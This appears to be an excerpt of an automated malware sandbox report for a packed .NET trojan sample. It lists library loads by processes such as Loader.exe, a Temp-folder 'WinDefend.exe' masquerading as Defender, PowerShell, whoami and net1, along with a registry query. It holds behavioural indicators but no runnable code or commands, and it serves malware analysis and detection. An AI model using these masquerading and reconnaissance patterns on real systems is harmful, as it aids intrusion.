Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: atlthunk.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: securityhealthsso.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: atlthunk.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: securityhealthsso.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\net1.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

